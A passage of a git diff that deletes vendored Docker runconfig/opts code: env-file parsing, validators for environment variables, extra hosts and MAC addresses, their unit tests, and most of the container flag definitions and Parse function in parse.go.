- lines = append(lines, fmt.Sprintf("%s=%s", strings.TrimSpace(line), os.Getenv(line))) - } - } - } - return lines, scanner.Err() -} - -var whiteSpaces = " \t" - -// ErrBadEnvVariable typed error for bad environment variable -type ErrBadEnvVariable struct { - msg string -} - -func (e ErrBadEnvVariable) Error() string { - return fmt.Sprintf("poorly formatted environment: %s", e.msg) -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go deleted file mode 100644 index 5dd7078bc0..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go +++ /dev/null @@ -1,142 +0,0 @@ -package opts - -import ( - "bufio" - "fmt" - "io/ioutil" - "os" - "reflect" - "strings" - "testing" -) - -func tmpFileWithContent(content string, t *testing.T) string { - tmpFile, err := ioutil.TempFile("", "envfile-test") - if err != nil { - t.Fatal(err) - } - defer tmpFile.Close() - - tmpFile.WriteString(content) - return tmpFile.Name() -} - -// Test ParseEnvFile for a file with a few well formatted lines -func TestParseEnvFileGoodFile(t *testing.T) { - content := `foo=bar - baz=quux -# comment - -_foobar=foobaz -with.dots=working -and_underscore=working too -` - // Adding a newline + a line with pure whitespace. - // This is being done like this instead of the block above - // because it's common for editors to trim trailing whitespace - // from lines, which becomes annoying since that's the - // exact thing we need to test. 
- content += "\n \t " - tmpFile := tmpFileWithContent(content, t) - defer os.Remove(tmpFile) - - lines, err := ParseEnvFile(tmpFile) - if err != nil { - t.Fatal(err) - } - - expectedLines := []string{ - "foo=bar", - "baz=quux", - "_foobar=foobaz", - "with.dots=working", - "and_underscore=working too", - } - - if !reflect.DeepEqual(lines, expectedLines) { - t.Fatal("lines not equal to expected_lines") - } -} - -// Test ParseEnvFile for an empty file -func TestParseEnvFileEmptyFile(t *testing.T) { - tmpFile := tmpFileWithContent("", t) - defer os.Remove(tmpFile) - - lines, err := ParseEnvFile(tmpFile) - if err != nil { - t.Fatal(err) - } - - if len(lines) != 0 { - t.Fatal("lines not empty; expected empty") - } -} - -// Test ParseEnvFile for a non existent file -func TestParseEnvFileNonExistentFile(t *testing.T) { - _, err := ParseEnvFile("foo_bar_baz") - if err == nil { - t.Fatal("ParseEnvFile succeeded; expected failure") - } - if _, ok := err.(*os.PathError); !ok { - t.Fatalf("Expected a PathError, got [%v]", err) - } -} - -// Test ParseEnvFile for a badly formatted file -func TestParseEnvFileBadlyFormattedFile(t *testing.T) { - content := `foo=bar - f =quux -` - - tmpFile := tmpFileWithContent(content, t) - defer os.Remove(tmpFile) - - _, err := ParseEnvFile(tmpFile) - if err == nil { - t.Fatalf("Expected an ErrBadEnvVariable, got nothing") - } - if _, ok := err.(ErrBadEnvVariable); !ok { - t.Fatalf("Expected an ErrBadEnvVariable, got [%v]", err) - } - expectedMessage := "poorly formatted environment: variable 'f ' has white spaces" - if err.Error() != expectedMessage { - t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error()) - } -} - -// Test ParseEnvFile for a file with a line exceeding bufio.MaxScanTokenSize -func TestParseEnvFileLineTooLongFile(t *testing.T) { - content := strings.Repeat("a", bufio.MaxScanTokenSize+42) - content = fmt.Sprint("foo=", content) - - tmpFile := tmpFileWithContent(content, t) - defer os.Remove(tmpFile) - - _, err := 
ParseEnvFile(tmpFile) - if err == nil { - t.Fatal("ParseEnvFile succeeded; expected failure") - } -} - -// ParseEnvFile with a random file, pass through -func TestParseEnvFileRandomFile(t *testing.T) { - content := `first line -another invalid line` - tmpFile := tmpFileWithContent(content, t) - defer os.Remove(tmpFile) - - _, err := ParseEnvFile(tmpFile) - - if err == nil { - t.Fatalf("Expected an ErrBadEnvVariable, got nothing") - } - if _, ok := err.(ErrBadEnvVariable); !ok { - t.Fatalf("Expected an ErrBadEnvvariable, got [%v]", err) - } - expectedMessage := "poorly formatted environment: variable 'first line' has white spaces" - if err.Error() != expectedMessage { - t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error()) - } -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env deleted file mode 100755 index 3a73358fffbc0d5d3d4df985ccf2f4a1a29cdb2a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 54 ucmezW&yB$!2yGdh7#tab7 1 { - return val, nil - } - if !doesEnvExist(val) { - return val, nil - } - return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil -} - -func doesEnvExist(name string) bool { - for _, entry := range os.Environ() { - parts := strings.SplitN(entry, "=", 2) - if runtime.GOOS == "windows" { - // Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent. - if strings.EqualFold(parts[0], name) { - return true - } - } - if parts[0] == name { - return true - } - } - return false -} - -// ValidateExtraHost validates that the specified string is a valid extrahost and returns it. -// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6). 
-func ValidateExtraHost(val string) (string, error) { - // allow for IPv6 addresses in extra hosts by only splitting on first ":" - arr := strings.SplitN(val, ":", 2) - if len(arr) != 2 || len(arr[0]) == 0 { - return "", fmt.Errorf("bad format for add-host: %q", val) - } - if _, err := fopts.ValidateIPAddress(arr[1]); err != nil { - return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1]) - } - return val, nil -} - -// ValidateMACAddress validates a MAC address. -func ValidateMACAddress(val string) (string, error) { - _, err := net.ParseMAC(strings.TrimSpace(val)) - if err != nil { - return "", err - } - return val, nil -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go deleted file mode 100644 index 43f8730fc4..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go +++ /dev/null @@ -1,113 +0,0 @@ -package opts - -import ( - "fmt" - "os" - "runtime" - "strings" - "testing" -) - -func TestValidateAttach(t *testing.T) { - valid := []string{ - "stdin", - "stdout", - "stderr", - "STDIN", - "STDOUT", - "STDERR", - } - if _, err := ValidateAttach("invalid"); err == nil { - t.Fatalf("Expected error with [valid streams are STDIN, STDOUT and STDERR], got nothing") - } - - for _, attach := range valid { - value, err := ValidateAttach(attach) - if err != nil { - t.Fatal(err) - } - if value != strings.ToLower(attach) { - t.Fatalf("Expected [%v], got [%v]", attach, value) - } - } -} - -func TestValidateEnv(t *testing.T) { - valids := map[string]string{ - "a": "a", - "something": "something", - "_=a": "_=a", - "env1=value1": "env1=value1", - "_env1=value1": "_env1=value1", - "env2=value2=value3": "env2=value2=value3", - "env3=abc!qwe": "env3=abc!qwe", - "env_4=value 4": "env_4=value 4", - "PATH": fmt.Sprintf("PATH=%v", os.Getenv("PATH")), - "PATH=something": "PATH=something", - "asd!qwe": "asd!qwe", - "1asd": "1asd", - "123": "123", - "some space": "some 
space", - " some space before": " some space before", - "some space after ": "some space after ", - } - // Environment variables are case in-sensitive on Windows - if runtime.GOOS == "windows" { - valids["PaTh"] = fmt.Sprintf("PaTh=%v", os.Getenv("PATH")) - } - for value, expected := range valids { - actual, err := ValidateEnv(value) - if err != nil { - t.Fatal(err) - } - if actual != expected { - t.Fatalf("Expected [%v], got [%v]", expected, actual) - } - } -} - -func TestValidateExtraHosts(t *testing.T) { - valid := []string{ - `myhost:192.168.0.1`, - `thathost:10.0.2.1`, - `anipv6host:2003:ab34:e::1`, - `ipv6local:::1`, - } - - invalid := map[string]string{ - `myhost:192.notanipaddress.1`: `invalid IP`, - `thathost-nosemicolon10.0.0.1`: `bad format`, - `anipv6host:::::1`: `invalid IP`, - `ipv6local:::0::`: `invalid IP`, - } - - for _, extrahost := range valid { - if _, err := ValidateExtraHost(extrahost); err != nil { - t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err) - } - } - - for extraHost, expectedError := range invalid { - if _, err := ValidateExtraHost(extraHost); err == nil { - t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost) - } else { - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError) - } - } - } -} - -func TestValidateMACAddress(t *testing.T) { - if _, err := ValidateMACAddress(`92:d0:c6:0a:29:33`); err != nil { - t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:29:33`) got %s", err) - } - - if _, err := ValidateMACAddress(`92:d0:c6:0a:33`); err == nil { - t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:33`) succeeded; expected failure on invalid MAC") - } - - if _, err := ValidateMACAddress(`random invalid string`); err == nil { - t.Fatalf("ValidateMACAddress(`random invalid string`) succeeded; expected failure on invalid MAC") - } -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse.go 
b/vendor/github.com/docker/docker/runconfig/opts/parse.go index 71a89277ec..8f7baeb637 100644 --- a/vendor/github.com/docker/docker/runconfig/opts/parse.go +++ b/vendor/github.com/docker/docker/runconfig/opts/parse.go @@ -1,695 +1,9 @@ -package opts +package opts // import "github.com/docker/docker/runconfig/opts" import ( - "bytes" - "encoding/json" - "fmt" - "io/ioutil" - "path" - "strconv" "strings" - "time" - - "github.com/docker/docker/api/types/container" - networktypes "github.com/docker/docker/api/types/network" - "github.com/docker/docker/api/types/strslice" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/signal" - "github.com/docker/go-connections/nat" - units "github.com/docker/go-units" - "github.com/spf13/pflag" ) -// ContainerOptions is a data object with all the options for creating a container -type ContainerOptions struct { - attach opts.ListOpts - volumes opts.ListOpts - tmpfs opts.ListOpts - blkioWeightDevice WeightdeviceOpt - deviceReadBps ThrottledeviceOpt - deviceWriteBps ThrottledeviceOpt - links opts.ListOpts - aliases opts.ListOpts - linkLocalIPs opts.ListOpts - deviceReadIOps ThrottledeviceOpt - deviceWriteIOps ThrottledeviceOpt - env opts.ListOpts - labels opts.ListOpts - devices opts.ListOpts - ulimits *UlimitOpt - sysctls *opts.MapOpts - publish opts.ListOpts - expose opts.ListOpts - dns opts.ListOpts - dnsSearch opts.ListOpts - dnsOptions opts.ListOpts - extraHosts opts.ListOpts - volumesFrom opts.ListOpts - envFile opts.ListOpts - capAdd opts.ListOpts - capDrop opts.ListOpts - groupAdd opts.ListOpts - securityOpt opts.ListOpts - storageOpt opts.ListOpts - labelsFile opts.ListOpts - loggingOpts opts.ListOpts - privileged bool - pidMode string - utsMode string - usernsMode string - publishAll bool - stdin bool - tty bool - oomKillDisable bool - oomScoreAdj int - containerIDFile string - entrypoint string - hostname string - memoryString string - memoryReservation string - memorySwap string - kernelMemory string - user 
string - workingDir string - cpuCount int64 - cpuShares int64 - cpuPercent int64 - cpuPeriod int64 - cpuRealtimePeriod int64 - cpuRealtimeRuntime int64 - cpuQuota int64 - cpus opts.NanoCPUs - cpusetCpus string - cpusetMems string - blkioWeight uint16 - ioMaxBandwidth string - ioMaxIOps uint64 - swappiness int64 - netMode string - macAddress string - ipv4Address string - ipv6Address string - ipcMode string - pidsLimit int64 - restartPolicy string - readonlyRootfs bool - loggingDriver string - cgroupParent string - volumeDriver string - stopSignal string - stopTimeout int - isolation string - shmSize string - noHealthcheck bool - healthCmd string - healthInterval time.Duration - healthTimeout time.Duration - healthRetries int - runtime string - autoRemove bool - init bool - initPath string - credentialSpec string - - Image string - Args []string -} - -// AddFlags adds all command line flags that will be used by Parse to the FlagSet -func AddFlags(flags *pflag.FlagSet) *ContainerOptions { - copts := &ContainerOptions{ - aliases: opts.NewListOpts(nil), - attach: opts.NewListOpts(ValidateAttach), - blkioWeightDevice: NewWeightdeviceOpt(ValidateWeightDevice), - capAdd: opts.NewListOpts(nil), - capDrop: opts.NewListOpts(nil), - dns: opts.NewListOpts(opts.ValidateIPAddress), - dnsOptions: opts.NewListOpts(nil), - dnsSearch: opts.NewListOpts(opts.ValidateDNSSearch), - deviceReadBps: NewThrottledeviceOpt(ValidateThrottleBpsDevice), - deviceReadIOps: NewThrottledeviceOpt(ValidateThrottleIOpsDevice), - deviceWriteBps: NewThrottledeviceOpt(ValidateThrottleBpsDevice), - deviceWriteIOps: NewThrottledeviceOpt(ValidateThrottleIOpsDevice), - devices: opts.NewListOpts(ValidateDevice), - env: opts.NewListOpts(ValidateEnv), - envFile: opts.NewListOpts(nil), - expose: opts.NewListOpts(nil), - extraHosts: opts.NewListOpts(ValidateExtraHost), - groupAdd: opts.NewListOpts(nil), - labels: opts.NewListOpts(ValidateEnv), - labelsFile: opts.NewListOpts(nil), - linkLocalIPs: 
opts.NewListOpts(nil), - links: opts.NewListOpts(ValidateLink), - loggingOpts: opts.NewListOpts(nil), - publish: opts.NewListOpts(nil), - securityOpt: opts.NewListOpts(nil), - storageOpt: opts.NewListOpts(nil), - sysctls: opts.NewMapOpts(nil, opts.ValidateSysctl), - tmpfs: opts.NewListOpts(nil), - ulimits: NewUlimitOpt(nil), - volumes: opts.NewListOpts(nil), - volumesFrom: opts.NewListOpts(nil), - } - - // General purpose flags - flags.VarP(&copts.attach, "attach", "a", "Attach to STDIN, STDOUT or STDERR") - flags.Var(&copts.devices, "device", "Add a host device to the container") - flags.VarP(&copts.env, "env", "e", "Set environment variables") - flags.Var(&copts.envFile, "env-file", "Read in a file of environment variables") - flags.StringVar(&copts.entrypoint, "entrypoint", "", "Overwrite the default ENTRYPOINT of the image") - flags.Var(&copts.groupAdd, "group-add", "Add additional groups to join") - flags.StringVarP(&copts.hostname, "hostname", "h", "", "Container host name") - flags.BoolVarP(&copts.stdin, "interactive", "i", false, "Keep STDIN open even if not attached") - flags.VarP(&copts.labels, "label", "l", "Set meta data on a container") - flags.Var(&copts.labelsFile, "label-file", "Read in a line delimited file of labels") - flags.BoolVar(&copts.readonlyRootfs, "read-only", false, "Mount the container's root filesystem as read only") - flags.StringVar(&copts.restartPolicy, "restart", "no", "Restart policy to apply when a container exits") - flags.StringVar(&copts.stopSignal, "stop-signal", signal.DefaultStopSignal, fmt.Sprintf("Signal to stop a container, %v by default", signal.DefaultStopSignal)) - flags.IntVar(&copts.stopTimeout, "stop-timeout", 0, "Timeout (in seconds) to stop a container") - flags.SetAnnotation("stop-timeout", "version", []string{"1.25"}) - flags.Var(copts.sysctls, "sysctl", "Sysctl options") - flags.BoolVarP(&copts.tty, "tty", "t", false, "Allocate a pseudo-TTY") - flags.Var(copts.ulimits, "ulimit", "Ulimit options") - 
flags.StringVarP(&copts.user, "user", "u", "", "Username or UID (format: [:])") - flags.StringVarP(&copts.workingDir, "workdir", "w", "", "Working directory inside the container") - flags.BoolVar(&copts.autoRemove, "rm", false, "Automatically remove the container when it exits") - - // Security - flags.Var(&copts.capAdd, "cap-add", "Add Linux capabilities") - flags.Var(&copts.capDrop, "cap-drop", "Drop Linux capabilities") - flags.BoolVar(&copts.privileged, "privileged", false, "Give extended privileges to this container") - flags.Var(&copts.securityOpt, "security-opt", "Security Options") - flags.StringVar(&copts.usernsMode, "userns", "", "User namespace to use") - flags.StringVar(&copts.credentialSpec, "credentialspec", "", "Credential spec for managed service account (Windows only)") - - // Network and port publishing flag - flags.Var(&copts.extraHosts, "add-host", "Add a custom host-to-IP mapping (host:ip)") - flags.Var(&copts.dns, "dns", "Set custom DNS servers") - // We allow for both "--dns-opt" and "--dns-option", although the latter is the recommended way. - // This is to be consistent with service create/update - flags.Var(&copts.dnsOptions, "dns-opt", "Set DNS options") - flags.Var(&copts.dnsOptions, "dns-option", "Set DNS options") - flags.MarkHidden("dns-opt") - flags.Var(&copts.dnsSearch, "dns-search", "Set custom DNS search domains") - flags.Var(&copts.expose, "expose", "Expose a port or a range of ports") - flags.StringVar(&copts.ipv4Address, "ip", "", "Container IPv4 address (e.g. 172.30.100.104)") - flags.StringVar(&copts.ipv6Address, "ip6", "", "Container IPv6 address (e.g. 2001:db8::33)") - flags.Var(&copts.links, "link", "Add link to another container") - flags.Var(&copts.linkLocalIPs, "link-local-ip", "Container IPv4/IPv6 link-local addresses") - flags.StringVar(&copts.macAddress, "mac-address", "", "Container MAC address (e.g. 
92:d0:c6:0a:29:33)") - flags.VarP(&copts.publish, "publish", "p", "Publish a container's port(s) to the host") - flags.BoolVarP(&copts.publishAll, "publish-all", "P", false, "Publish all exposed ports to random ports") - // We allow for both "--net" and "--network", although the latter is the recommended way. - flags.StringVar(&copts.netMode, "net", "default", "Connect a container to a network") - flags.StringVar(&copts.netMode, "network", "default", "Connect a container to a network") - flags.MarkHidden("net") - // We allow for both "--net-alias" and "--network-alias", although the latter is the recommended way. - flags.Var(&copts.aliases, "net-alias", "Add network-scoped alias for the container") - flags.Var(&copts.aliases, "network-alias", "Add network-scoped alias for the container") - flags.MarkHidden("net-alias") - - // Logging and storage - flags.StringVar(&copts.loggingDriver, "log-driver", "", "Logging driver for the container") - flags.StringVar(&copts.volumeDriver, "volume-driver", "", "Optional volume driver for the container") - flags.Var(&copts.loggingOpts, "log-opt", "Log driver options") - flags.Var(&copts.storageOpt, "storage-opt", "Storage driver options for the container") - flags.Var(&copts.tmpfs, "tmpfs", "Mount a tmpfs directory") - flags.Var(&copts.volumesFrom, "volumes-from", "Mount volumes from the specified container(s)") - flags.VarP(&copts.volumes, "volume", "v", "Bind mount a volume") - - // Health-checking - flags.StringVar(&copts.healthCmd, "health-cmd", "", "Command to run to check health") - flags.DurationVar(&copts.healthInterval, "health-interval", 0, "Time between running the check (ns|us|ms|s|m|h) (default 0s)") - flags.IntVar(&copts.healthRetries, "health-retries", 0, "Consecutive failures needed to report unhealthy") - flags.DurationVar(&copts.healthTimeout, "health-timeout", 0, "Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)") - flags.BoolVar(&copts.noHealthcheck, "no-healthcheck", false, "Disable any 
container-specified HEALTHCHECK") - - // Resource management - flags.Uint16Var(&copts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)") - flags.Var(&copts.blkioWeightDevice, "blkio-weight-device", "Block IO weight (relative device weight)") - flags.StringVar(&copts.containerIDFile, "cidfile", "", "Write the container ID to the file") - flags.StringVar(&copts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") - flags.StringVar(&copts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") - flags.Int64Var(&copts.cpuCount, "cpu-count", 0, "CPU count (Windows only)") - flags.Int64Var(&copts.cpuPercent, "cpu-percent", 0, "CPU percent (Windows only)") - flags.Int64Var(&copts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period") - flags.Int64Var(&copts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota") - flags.Int64Var(&copts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit CPU real-time period in microseconds") - flags.Int64Var(&copts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit CPU real-time runtime in microseconds") - flags.Int64VarP(&copts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") - flags.Var(&copts.cpus, "cpus", "Number of CPUs") - flags.Var(&copts.deviceReadBps, "device-read-bps", "Limit read rate (bytes per second) from a device") - flags.Var(&copts.deviceReadIOps, "device-read-iops", "Limit read rate (IO per second) from a device") - flags.Var(&copts.deviceWriteBps, "device-write-bps", "Limit write rate (bytes per second) to a device") - flags.Var(&copts.deviceWriteIOps, "device-write-iops", "Limit write rate (IO per second) to a device") - flags.StringVar(&copts.ioMaxBandwidth, "io-maxbandwidth", "", "Maximum IO bandwidth limit for the system drive (Windows only)") - flags.Uint64Var(&copts.ioMaxIOps, "io-maxiops", 0, "Maximum IOps limit for the system drive (Windows only)") - 
flags.StringVar(&copts.kernelMemory, "kernel-memory", "", "Kernel memory limit") - flags.StringVarP(&copts.memoryString, "memory", "m", "", "Memory limit") - flags.StringVar(&copts.memoryReservation, "memory-reservation", "", "Memory soft limit") - flags.StringVar(&copts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") - flags.Int64Var(&copts.swappiness, "memory-swappiness", -1, "Tune container memory swappiness (0 to 100)") - flags.BoolVar(&copts.oomKillDisable, "oom-kill-disable", false, "Disable OOM Killer") - flags.IntVar(&copts.oomScoreAdj, "oom-score-adj", 0, "Tune host's OOM preferences (-1000 to 1000)") - flags.Int64Var(&copts.pidsLimit, "pids-limit", 0, "Tune container pids limit (set -1 for unlimited)") - - // Low-level execution (cgroups, namespaces, ...) - flags.StringVar(&copts.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container") - flags.StringVar(&copts.ipcMode, "ipc", "", "IPC namespace to use") - flags.StringVar(&copts.isolation, "isolation", "", "Container isolation technology") - flags.StringVar(&copts.pidMode, "pid", "", "PID namespace to use") - flags.StringVar(&copts.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB") - flags.StringVar(&copts.utsMode, "uts", "", "UTS namespace to use") - flags.StringVar(&copts.runtime, "runtime", "", "Runtime to use for this container") - - flags.BoolVar(&copts.init, "init", false, "Run an init inside the container that forwards signals and reaps processes") - flags.StringVar(&copts.initPath, "init-path", "", "Path to the docker-init binary") - return copts -} - -// Parse parses the args for the specified command and generates a Config, -// a HostConfig and returns them with the specified command. -// If the specified args are not valid, it will return an error. 
-func Parse(flags *pflag.FlagSet, copts *ContainerOptions) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { - var ( - attachStdin = copts.attach.Get("stdin") - attachStdout = copts.attach.Get("stdout") - attachStderr = copts.attach.Get("stderr") - ) - - // Validate the input mac address - if copts.macAddress != "" { - if _, err := ValidateMACAddress(copts.macAddress); err != nil { - return nil, nil, nil, fmt.Errorf("%s is not a valid mac address", copts.macAddress) - } - } - if copts.stdin { - attachStdin = true - } - // If -a is not set, attach to stdout and stderr - if copts.attach.Len() == 0 { - attachStdout = true - attachStderr = true - } - - var err error - - var memory int64 - if copts.memoryString != "" { - memory, err = units.RAMInBytes(copts.memoryString) - if err != nil { - return nil, nil, nil, err - } - } - - var memoryReservation int64 - if copts.memoryReservation != "" { - memoryReservation, err = units.RAMInBytes(copts.memoryReservation) - if err != nil { - return nil, nil, nil, err - } - } - - var memorySwap int64 - if copts.memorySwap != "" { - if copts.memorySwap == "-1" { - memorySwap = -1 - } else { - memorySwap, err = units.RAMInBytes(copts.memorySwap) - if err != nil { - return nil, nil, nil, err - } - } - } - - var kernelMemory int64 - if copts.kernelMemory != "" { - kernelMemory, err = units.RAMInBytes(copts.kernelMemory) - if err != nil { - return nil, nil, nil, err - } - } - - swappiness := copts.swappiness - if swappiness != -1 && (swappiness < 0 || swappiness > 100) { - return nil, nil, nil, fmt.Errorf("invalid value: %d. 
Valid memory swappiness range is 0-100", swappiness) - } - - var shmSize int64 - if copts.shmSize != "" { - shmSize, err = units.RAMInBytes(copts.shmSize) - if err != nil { - return nil, nil, nil, err - } - } - - // TODO FIXME units.RAMInBytes should have a uint64 version - var maxIOBandwidth int64 - if copts.ioMaxBandwidth != "" { - maxIOBandwidth, err = units.RAMInBytes(copts.ioMaxBandwidth) - if err != nil { - return nil, nil, nil, err - } - if maxIOBandwidth < 0 { - return nil, nil, nil, fmt.Errorf("invalid value: %s. Maximum IO Bandwidth must be positive", copts.ioMaxBandwidth) - } - } - - var binds []string - volumes := copts.volumes.GetMap() - // add any bind targets to the list of container volumes - for bind := range copts.volumes.GetMap() { - if arr := volumeSplitN(bind, 2); len(arr) > 1 { - // after creating the bind mount we want to delete it from the copts.volumes values because - // we do not want bind mounts being committed to image configs - binds = append(binds, bind) - // We should delete from the map (`volumes`) here, as deleting from copts.volumes will not work if - // there are duplicates entries. 
- delete(volumes, bind) - } - } - - // Can't evaluate options passed into --tmpfs until we actually mount - tmpfs := make(map[string]string) - for _, t := range copts.tmpfs.GetAll() { - if arr := strings.SplitN(t, ":", 2); len(arr) > 1 { - tmpfs[arr[0]] = arr[1] - } else { - tmpfs[arr[0]] = "" - } - } - - var ( - runCmd strslice.StrSlice - entrypoint strslice.StrSlice - ) - - if len(copts.Args) > 0 { - runCmd = strslice.StrSlice(copts.Args) - } - - if copts.entrypoint != "" { - entrypoint = strslice.StrSlice{copts.entrypoint} - } else if flags.Changed("entrypoint") { - // if `--entrypoint=` is parsed then Entrypoint is reset - entrypoint = []string{""} - } - - ports, portBindings, err := nat.ParsePortSpecs(copts.publish.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - // Merge in exposed ports to the map of published ports - for _, e := range copts.expose.GetAll() { - if strings.Contains(e, ":") { - return nil, nil, nil, fmt.Errorf("invalid port format for --expose: %s", e) - } - //support two formats for expose, original format /[] or /[] - proto, port := nat.SplitProtoPort(e) - //parse the start and end port and create a sequence of ports to expose - //if expose a port, the start and end port are the same - start, end, err := nat.ParsePortRange(port) - if err != nil { - return nil, nil, nil, fmt.Errorf("invalid range format for --expose: %s, error: %s", e, err) - } - for i := start; i <= end; i++ { - p, err := nat.NewPort(proto, strconv.FormatUint(i, 10)) - if err != nil { - return nil, nil, nil, err - } - if _, exists := ports[p]; !exists { - ports[p] = struct{}{} - } - } - } - - // parse device mappings - deviceMappings := []container.DeviceMapping{} - for _, device := range copts.devices.GetAll() { - deviceMapping, err := ParseDevice(device) - if err != nil { - return nil, nil, nil, err - } - deviceMappings = append(deviceMappings, deviceMapping) - } - - // collect all the environment variables for the container - envVariables, err := 
ReadKVStrings(copts.envFile.GetAll(), copts.env.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - // collect all the labels for the container - labels, err := ReadKVStrings(copts.labelsFile.GetAll(), copts.labels.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - ipcMode := container.IpcMode(copts.ipcMode) - if !ipcMode.Valid() { - return nil, nil, nil, fmt.Errorf("--ipc: invalid IPC mode") - } - - pidMode := container.PidMode(copts.pidMode) - if !pidMode.Valid() { - return nil, nil, nil, fmt.Errorf("--pid: invalid PID mode") - } - - utsMode := container.UTSMode(copts.utsMode) - if !utsMode.Valid() { - return nil, nil, nil, fmt.Errorf("--uts: invalid UTS mode") - } - - usernsMode := container.UsernsMode(copts.usernsMode) - if !usernsMode.Valid() { - return nil, nil, nil, fmt.Errorf("--userns: invalid USER mode") - } - - restartPolicy, err := ParseRestartPolicy(copts.restartPolicy) - if err != nil { - return nil, nil, nil, err - } - - loggingOpts, err := parseLoggingOpts(copts.loggingDriver, copts.loggingOpts.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - securityOpts, err := parseSecurityOpts(copts.securityOpt.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - storageOpts, err := parseStorageOpts(copts.storageOpt.GetAll()) - if err != nil { - return nil, nil, nil, err - } - - // Healthcheck - var healthConfig *container.HealthConfig - haveHealthSettings := copts.healthCmd != "" || - copts.healthInterval != 0 || - copts.healthTimeout != 0 || - copts.healthRetries != 0 - if copts.noHealthcheck { - if haveHealthSettings { - return nil, nil, nil, fmt.Errorf("--no-healthcheck conflicts with --health-* options") - } - test := strslice.StrSlice{"NONE"} - healthConfig = &container.HealthConfig{Test: test} - } else if haveHealthSettings { - var probe strslice.StrSlice - if copts.healthCmd != "" { - args := []string{"CMD-SHELL", copts.healthCmd} - probe = strslice.StrSlice(args) - } - if copts.healthInterval < 0 { - 
return nil, nil, nil, fmt.Errorf("--health-interval cannot be negative") - } - if copts.healthTimeout < 0 { - return nil, nil, nil, fmt.Errorf("--health-timeout cannot be negative") - } - - healthConfig = &container.HealthConfig{ - Test: probe, - Interval: copts.healthInterval, - Timeout: copts.healthTimeout, - Retries: copts.healthRetries, - } - } - - resources := container.Resources{ - CgroupParent: copts.cgroupParent, - Memory: memory, - MemoryReservation: memoryReservation, - MemorySwap: memorySwap, - MemorySwappiness: &copts.swappiness, - KernelMemory: kernelMemory, - OomKillDisable: &copts.oomKillDisable, - NanoCPUs: copts.cpus.Value(), - CPUCount: copts.cpuCount, - CPUPercent: copts.cpuPercent, - CPUShares: copts.cpuShares, - CPUPeriod: copts.cpuPeriod, - CpusetCpus: copts.cpusetCpus, - CpusetMems: copts.cpusetMems, - CPUQuota: copts.cpuQuota, - CPURealtimePeriod: copts.cpuRealtimePeriod, - CPURealtimeRuntime: copts.cpuRealtimeRuntime, - PidsLimit: copts.pidsLimit, - BlkioWeight: copts.blkioWeight, - BlkioWeightDevice: copts.blkioWeightDevice.GetList(), - BlkioDeviceReadBps: copts.deviceReadBps.GetList(), - BlkioDeviceWriteBps: copts.deviceWriteBps.GetList(), - BlkioDeviceReadIOps: copts.deviceReadIOps.GetList(), - BlkioDeviceWriteIOps: copts.deviceWriteIOps.GetList(), - IOMaximumIOps: copts.ioMaxIOps, - IOMaximumBandwidth: uint64(maxIOBandwidth), - Ulimits: copts.ulimits.GetList(), - Devices: deviceMappings, - } - - config := &container.Config{ - Hostname: copts.hostname, - ExposedPorts: ports, - User: copts.user, - Tty: copts.tty, - // TODO: deprecated, it comes from -n, --networking - // it's still needed internally to set the network to disabled - // if e.g. 
bridge is none in daemon opts, and in inspect - NetworkDisabled: false, - OpenStdin: copts.stdin, - AttachStdin: attachStdin, - AttachStdout: attachStdout, - AttachStderr: attachStderr, - Env: envVariables, - Cmd: runCmd, - Image: copts.Image, - Volumes: volumes, - MacAddress: copts.macAddress, - Entrypoint: entrypoint, - WorkingDir: copts.workingDir, - Labels: ConvertKVStringsToMap(labels), - Healthcheck: healthConfig, - } - if flags.Changed("stop-signal") { - config.StopSignal = copts.stopSignal - } - if flags.Changed("stop-timeout") { - config.StopTimeout = &copts.stopTimeout - } - - hostConfig := &container.HostConfig{ - Binds: binds, - ContainerIDFile: copts.containerIDFile, - OomScoreAdj: copts.oomScoreAdj, - AutoRemove: copts.autoRemove, - Privileged: copts.privileged, - PortBindings: portBindings, - Links: copts.links.GetAll(), - PublishAllPorts: copts.publishAll, - // Make sure the dns fields are never nil. - // New containers don't ever have those fields nil, - // but pre created containers can still have those 